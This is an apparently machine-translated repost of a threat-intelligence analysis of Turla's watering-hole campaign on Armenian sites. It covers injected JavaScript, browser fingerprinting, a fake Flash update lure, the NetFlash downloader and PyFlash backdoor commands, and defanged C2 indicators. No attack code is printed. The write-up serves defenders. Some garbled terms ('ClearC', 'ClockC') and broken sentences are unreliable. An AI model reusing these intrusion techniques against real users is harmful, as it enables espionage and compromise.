Shulou(Shulou.com)05/31 Report--

I would like to share with you how Turla uses puddles to attack and implant into the backdoor. I believe most people don't know much about it, so share this article for your reference. I hope you will learn a lot after reading this article. Let's learn about it together.

For learning and reference only

Target website

Turla destroyed at least four Armenian sites, including two government sites. As a result, targets may include government officials and politicians. The following websites have been compromised:

Armconsul [.] Ru: consular Office of the Embassy of Armenia, Russia

Mnp.nkr [.] Ministry of Natural Conservation and Natural Resources of the Republic of am:Artsakh

Aiisa [.] Am: Armenian Institute of International and Security Affairs

Adgf [.] Am: Armenian Deposit guarantee Fund

These sites have been hacked since at least early 2019. Turla exploits illegal access to insert malicious JavaScript code into the website. For example, for mnp.nkr [.] Am, with obfuscated code attached to the end of jquery-migrate.min.js (the common JavaScript library), as shown in figure 1:

Changing the code will com/wp-includes/data_from_db_top.php.' from 'skategirlchina [.] Download additional JavaScript scripts. Since November 2019, it has been found that the site no longer spreads malicious scripts, and Turla seems to have suspended their activities.

User fingerprint and Communication chain

After visiting the infected web page, the skategirlchina [.] com implants the second-stage malicious JavaScript and adds fingerprints to the visitor's browser. Figure 2 shows the main functions of this script.

If this is the first time the user's browser executes the script, it will add an evercookie with a random MD5 value provided by the server, which is different each time the script is executed. Evercookie is implemented based on GitHub code. It uses multiple storage locations (such as local database, Flash cookie,Silverlight storage, etc.) to store cookie values. It is more persistent than regular Cookie, and if the user simply deletes the browser's Cookie, it will not be deleted.

The evercookie will be used to identify whether the user has visited the infected website again. When the user accesses the second time, the previously stored MD5 value can be used to identify the second access behavior.

It collects a list of browser plug-ins, screen resolution and various operating system information, which is sent by POST to the client C server. If there is a reply, it is considered to be JavaScript code and executed using the eval function.

If the attacker is interested in the infected target, the server replies with a piece of JavaScript code. In this event, Turla is only interested in a very limited number of goals of visiting the site. A fake Adobe Flash update warning is then displayed to the user, as shown in figure 3, to induce them to download a malicious Flash installer.

No exploiting techniques for browser vulnerabilities were observed, and only social engineering skills were relied on in the activities. If the user starts the executable manually, Turla malware and legitimate Adobe Flash programs will be installed. Figure 4 shows the transfer of the malicious load from the initial visit to the infected Armenian website.

Malware

Once a user executes a fake installer, it executes both Turla malware and a legitimate Adobe Flash installer. Therefore, the user may think that the update warning is legal.

Skipper

By August 2019, the victim will receive a RAR-SFX containing a legitimate Adobe Flash v14 installer and another RAR-SFX. The latter contains various components of the back door. The latest version was recorded by Telsy in May 2019.

The remote JavaScript and malicious file server used by Skipper communication module is ClearC server, Skategirlchina [.com / wp-includes / ms-locale.php.

NetFlash and PyFlash

A new malicious payload was found at the end of August. The new malicious payload is a .NET program that removes the installer for Adobe Flash v32 in% TEMP%\ adobe.exe and the NetFlash (.NET downloader) in% TEMP%\ winhost.exe. According to the compilation time stamp, malicious samples were compiled at the end of August 2019 and early September 2019.

NetFlash is responsible for downloading its second phase malware from hard-coded URL and using Windows to schedule tasks to establish persistence. Figure 5 shows the NetFlash feature for downloading phase II malware called PyFlash. Another NetFlash sample was also found, compiled at the end of August 2019, with a different hard-coded Cobb C server: 134.209.222 [.] 206 15363.

In the second stage, the back door is the py2exe executable. Py2exe is an Python extension that converts Python scripts into Windows executables. This is the first time a Turla developer has used the Python language in the backdoor.

The back door communicates with the hard-coded ClearC server through HTTP. The ClearC URL and other parameters (such as AES key and IV) used to encrypt network traffic are specified at the beginning of the script, as shown in figure 6.

The main function of the script (shown in figure 7) is to send machine information to the ClearC server, as well as the output of OS-related commands (systeminfo,tasklist) and network-related commands (ipconfig,getmac,arp).

The client C server can also send backdoor commands in JSON format. The commands are:

1. Download other files from the given HTTP (S) link.

2. Use the Python function subprocess32.Popen to execute the Windows command.

3. Modify Windows tasks and start malware on a regular basis (every X minutes; default is 5 minutes).

4. Kill (uninstall) malware. To confirm this directive, the malware sends the POST request to the ClearC server using the following string:

Summary

Turla still uses puddle attacks as one of its initial intrusion targets. Based on social engineering techniques, this campaign uses fake Adobe Flash update warnings to induce users to download and install malware. On the other hand, the payload has changed, possibly to evade detection, the malicious load is NetFlash, and a backdoor called PyFlash is installed, which is developed in Python.

IoCs

Website

Http://www.armconsul[.]ru/user/themes/ayeps/dist/js/bundle.0eb0f2cb2808b4b35a94.js

Http://mnp.nkr[.]am/wp-includes/js/jquery/jquery-migrate.min.js

Http://aiisa[.]am/js/chatem/js_rA9bo8_O3Pnw_5wJXExNhtkUMdfBYCifTJctEJ8C_Mg.js

Adgf [.] am

ClockC servers

Http://skategirlchina[.]com/wp-includes/data_from_db_top.php

Http://skategirlchina[.]com/wp-includes/ms-locale.php

Http://37.59.60[.]199/2018/.config/adobe

Http://134.209.222[.]206:15363

Http://85.222.235[.]156:8000

Sample

MITRE ATT&CK techniques

These are all the contents of the article "how to use puddle attacks to implant backdoors in Turla". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.